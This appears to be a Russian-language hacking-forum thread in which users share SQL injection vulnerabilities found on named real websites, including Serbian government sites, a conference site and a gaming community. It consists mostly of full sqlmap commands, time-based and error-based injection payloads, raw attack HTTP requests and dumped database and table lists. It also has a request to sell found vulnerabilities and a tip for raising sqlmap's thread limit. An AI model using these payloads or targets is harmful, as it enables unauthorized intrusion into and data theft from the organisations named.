-
XSS.stack #1 – первый литературный журнал от юзеров форума
Найденные интересеные SQL inj & XSS
- Автор темы Xrenovi4
- Дата начала
Database: midtownjdb
[27 tables]
+---------------------+
| aboutmaster |
| appointmentmaster |
| appointsubjectmster |
| brandscontentmaster |
| catalogmaster |
| cjlrymaster |
| contactusmaster |
| custdet |
| edumaster |
| eventsmaster |
| gcleaningguide |
| genericmaster |
| hitcoun |
| hpgdtls |
| hpgdtlsflash |
| linkmaster |
| ordermstr |
| ordersub |
| prodinquiry |
| proposalmaster |
| scartmster |
| seomaster |
| servicemaster |
| storehoursmaster1 |
| tempscartmaster |
| testimonialmaster |
| wlist |
+---------------------+
[*] aegisit_practical
[*] information_schema
[*] practicalbackup070819
Database: aegisit_practical
[36 tables]
+---------------------------+
| admin_outbox |
| admin_settings |
| attendance |
| attendance_backup |
| case_studies |
| certifications |
| class_dates |
| class_dates_after_deletes |
| classes |
| classes_backup |
| consent_forms |
| emails |
| ethics_forms |
| evaluation_forms |
| files |
| files_to_users |
| forms |
| google_oauth |
| level2_apps |
| marctest |
| messages |
| messages_to_users |
| practitioners |
| sessions |
| test_attempts |
| test_questions |
| test_sections |
| tests_taken |
| tokens |
| user_classes |
| users |
| users_backup_031720 |
| users_backup_062123 |
| users_backup_090420 |
| users_backup_092222 |
| webhooks |
+---------------------------+
Known Microsoft honeypot. Its been all over twitter used for threat intelligence.
gammabiolabs.nl
available databases [18]:
[*] gammab1q_calidad_insumos
[*] gammab1q_clientes
[*] gammab1q_clientes2
[*] gammab1q_clientes_expofarma
[*] gammab1q_encuestas
[*] gammab1q_fact_proveedores
[*] gammab1q_GBL_cupones
[*] gammab1q_inventario_mx
[*] gammab1q_inventario_NL
[*] gammab1q_invitados
[*] gammab1q_produccion_lotes
[*] gammab1q_quejas_sugerencias
[*] gammab1q_Sale_Nederland
[*] gammab1q_Sample_Nederland
[*] gammab1q_starfilters_cdmx
[*] gammab1q_steridental
[*] gammab1q_ventas
[*] information_schema
vuln POST param: email
-1' OR 3*2*1=6 AND 000487=000487 --
available databases [18]:
[*] gammab1q_calidad_insumos
[*] gammab1q_clientes
[*] gammab1q_clientes2
[*] gammab1q_clientes_expofarma
[*] gammab1q_encuestas
[*] gammab1q_fact_proveedores
[*] gammab1q_GBL_cupones
[*] gammab1q_inventario_mx
[*] gammab1q_inventario_NL
[*] gammab1q_invitados
[*] gammab1q_produccion_lotes
[*] gammab1q_quejas_sugerencias
[*] gammab1q_Sale_Nederland
[*] gammab1q_Sample_Nederland
[*] gammab1q_starfilters_cdmx
[*] gammab1q_steridental
[*] gammab1q_ventas
[*] information_schema
vuln POST param: email
-1' OR 3*2*1=6 AND 000487=000487 --
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=sgdffsddas@gmail.com' AND (SELECT 3046 FROM (SELECT(SLEEP(5)))fYIj) AND 'yAFV'='yAFV&passcode=sad2rrsd
---
database: nsaaofficials
больше 300 таблиц. по идее должно быть куча edu почт
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=sgdffsddas@gmail.com' AND (SELECT 3046 FROM (SELECT(SLEEP(5)))fYIj) AND 'yAFV'='yAFV&passcode=sad2rrsd
---
database: nsaaofficials
больше 300 таблиц. по идее должно быть куча edu почт
Tilastopaja Oy Track and field statistics
www.tilastopaja.eu
GET /birthday.php?d=6&m=(select(0)from(select(sleep(6.692)))v)/*'%2B(select(0)from(select(sleep(6.692)))v)%2B'"%2B(select(0)from(select(sleep(6.692)))v)%2B"*/ HTTP/1.1X-Requested-With: XMLHttpRequestReferer: https://www.tilastopaja.eu/forgotpw.phpCookie: sec_session_id=h9gi9kddintpg15dbqrlhasks7Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.tilastopaja.euConnection: Keep-alive
URL encoded GET input m was set to (select(0)from(select(sleep(6.692)))v)/*'+(select(0)from(select(sleep(6.692)))v)+'"+(select(0)from(select(sleep(6.692)))v)+"*/
POST /logistics/forgotpw.php HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36X-Forwarded-For: 1zjKz0'XOR(if(now()=sysdate(),sleep(6),0))XOR'ZCookie: dchero_net=178.176.72.1801714251097191231828; _djo=55utvddfu5bfpofp27mlgdv4r1X-Requested-With: XMLHttpRequestContent-Length: 0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: www.darkjedi.orgConnection: Keep-alive
Lost Password Retrieval • DJO Gaming
DarkJedi.Org (DJO) is a free online gaming community host of clubs, clans, and guilds for gamers from around the world. More than a clan host, DJO is a community - a place to meet new people and build friendships.
www.darkjedi.org
POST /forgotPW.php HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://member.ffsi.com/login.phpCookie: PHPSESSID=7c212fb41011b2d873790792621d6e51Content-Length: 99Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: member.ffsi.comConnection: Keep-aliveemail=testing%40example.com&rqID=10"XOR(1*if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z&sendPW=1&submit=
URL:http://member.ffsi.com/forgotPW.php
Parameter:rqID
URL:http://member.ffsi.com/forgotPW.php
Parameter:rqID
POST /eit2024/forgotpw.php HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: https://eit-conference.org/eit2024/forgotpw.phpCookie: ASPSESSIONIDQUATBRCQ=GHOJEOJCNAMIDJJJHAMHMOPPContent-Length: 52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: eit-conference.orgConnection: Keep-aliveEmail=-1'%20OR%203*2*1=6%20AND%2000093=00093%20--%20
URL:https://eit-conference.org/eit2024/forgotpw.php
Parameter:Emai
SQL query - SELECT database()
eit
URL:https://eit-conference.org/eit2024/forgotpw.php
Parameter:Emai
SQL query - SELECT database()
eit
Any idea on gql query injection?
Ministry of Economy of the Republic of Serbia
Код:
sqlmap --url="https://privatizacija.privreda.gov.rs/*" --dbs --threads=10 --time-sec=10 --dbms=mysql
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[00:02:52] [INFO] testing connection to the target URL
got a 301 redirect to 'https://privatizacija.privreda.gov.rs:443/Naslovna'. Do you want to follow? [Y/n] n
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v0cqvvd08uu...tq6uen1dj5'). Do you want to use those [Y/n] Y
[00:02:54] [INFO] testing if the target URL content is stable
[00:02:54] [WARNING] URI parameter '#1*' does not appear to be dynamic
[00:02:55] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[00:02:55] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[00:02:55] [INFO] testing for SQL injection on URI parameter '#1*'
[00:02:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:03:07] [WARNING] reflective value(s) found and filtering out
[00:03:13] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:03:16] [INFO] testing 'Generic inline queries'
[00:03:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:03:21] [INFO] URI parameter '#1*' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit] s
[00:04:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:04:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:04:41] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: https://privatizacija.privreda.gov.rs:443/' AND EXTRACTVALUE(5713,CONCAT(0x5c,0x716a626b71,(SELECT (ELT(5713=5713,1))),0x717a6a6a71)) AND 'QVlF'='QVlF
---
[00:04:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.4.16, PHP
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[00:04:50] [INFO] fetching database names
[00:04:50] [INFO] starting 2 threads
[00:04:51] [INFO] retrieved: 'information_schema'
[00:04:51] [INFO] retrieved: 'agencija'
available databases [2]:
[*] agencija
[*] information_schema
Код:
sqlmap -url="https://rfzo.gov.rs/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms=mysql --random-agent --dbs -p list[fullordering] --threads=10 --time-sec=5
[23:11:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de-AT; rv:1.9.1.8) Gecko/20100625 Firefox/3.6.6' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:11:02] [INFO] testing connection to the target URL
[23:11:02] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('fd1e006bbbf545b5e9af846e8842ed46=kgl6tkocqqn...40r5rftkd5'). Do you want to use those [Y/n] y
[23:11:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:11:05] [INFO] testing if the target URL content is stable
[23:11:05] [INFO] target URL content is stable
[23:11:08] [INFO] heuristic (basic) test shows that GET parameter 'list[fullordering]' might be injectable (possible DBMS: 'MySQL')
[23:11:08] [INFO] testing for SQL injection on GET parameter 'list[fullordering]'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:23:21] [INFO] GET parameter 'list[fullordering]' is 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' injectable
[23:23:48] [INFO] GET parameter 'list[fullordering]' appears to be 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' injectable
[23:23:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:23:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:23:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:24:07] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[23:24:17] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[23:24:26] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[23:24:34] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[23:24:43] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[23:24:52] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[23:25:01] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[23:25:10] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[23:25:18] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 1907 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9297 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(9297=9297,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9266 FROM (SELECT(SLEEP(5)))wFLW)
---
[23:25:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7
web application technology: PHP 5.4.16, Apache 2.4.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:25:30] [INFO] fetching database names
[23:25:30] [INFO] starting 7 threads
[23:25:31] [INFO] retrieved: 'information_schema'
[23:25:31] [INFO] retrieved: 'novidzo1'
[23:25:31] [INFO] retrieved: 'novidzo5'
[23:25:31] [INFO] retrieved: 'novidzo7'
[23:25:31] [INFO] retrieved: 'novidzo'
[23:25:31] [INFO] retrieved: 'novidzo2'
[23:25:31] [INFO] retrieved: 'novidzo3'
available databases [7]:
[*] information_schema
[*] novidzo
[*] novidzo1
[*] novidzo2
[*] novidzo3
[*] novidzo5
[*] novidzo7
SQL Injection Vulnerability com_fields in Joomla 3.7
he vulnerability is caused by a new component, com_fields, which was introduced Joomla in version 3.7. If you use this version, you are affected.
malware.expert
Может есть подобный топик ,но с продажей найденных SQL уязвимостей?
Нашел с 10 ок скуль на жирных сайтах ,но не получается их самостоятельно раскрутить под слив базы
Нашел с 10 ок скуль на жирных сайтах ,но не получается их самостоятельно раскрутить под слив базы
and what to do to stay not to post here like youP.S. Баян из 2017 года)SQL Injection Vulnerability com_fields in Joomla 3.7
he vulnerability is caused by a new component, com_fields, which was introduced Joomla in version 3.7. If you use this version, you are affected.malware.expert
to say for your friends look im hacker look what i did
share here things if its exploitable
fuck them
help fourm kings
not the enemy to be bug bounty hunter lol
have nice day
Код:
python3 sqlmap.py --url="https://jela.rs/user/?func=User_Login" --data="username=admin&password=admin" --dbs --random-agent --threads=25 --time-sec=5 --batch --level=5 --risk=3
[10:44:11] [INFO] POST parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --code=200)
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=admin' OR NOT 6970=6970 OR 'uuph'='TPkx&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1789 FROM (SELECT(SLEEP(5)))Ywui) OR 'mstI'='jZWE&password=admin
---
[10:51:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
Ghauri identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
current_user(): 'jela_user@localhost'
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: username=admin'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&password=admin
---
available databases [2]:
[*] information_schema
[*] jela_db
^[^CDatabase: jela_db
[33 tables]
+--------------------------------+
| cms2_catalog_dodaci_value |
| cms2_administrators |
| cms2_catalog_manufacturer |
| cms2_catalog_order |
| cms2_catalog_1 |
| cms2__country |
| cms2__currency |
| cms2_ambijenti_koordinate |
| cms2_banner_picture |
| cms2__zone_international |
| cms2_catalog_order_items |
| cms2_catalog_funcionality |
| cms2_catalog_copy |
| cms2_catalog |
| cms2_catalog_invoice |
| cms2_catalog_list |
| cms2_catalog_discount_quantity |
| cms2_catalog_colors |
| cms2_alias |
| cms2_abmijenti |
| cms2_article |
| cms2__continent |
| cms2_catalog_colors_value |
| cms2__vat |
| cms2_banner |
| cms2_catalog_orders |
| cms2_catalog_discount_value |
| cms2_article_category |
| cms2_catalog_parameter |
| cms2__collector_types |
| cms2_catalog_category |
| cms2__zone_domestic |
| cms2_catalog_order_item |как тебе удалось запустить мапу в 25 потоков?
В lib/core/settings.py
Поменяй значение MAX_NUMBER_OF_THREADS
где же ты раньше был????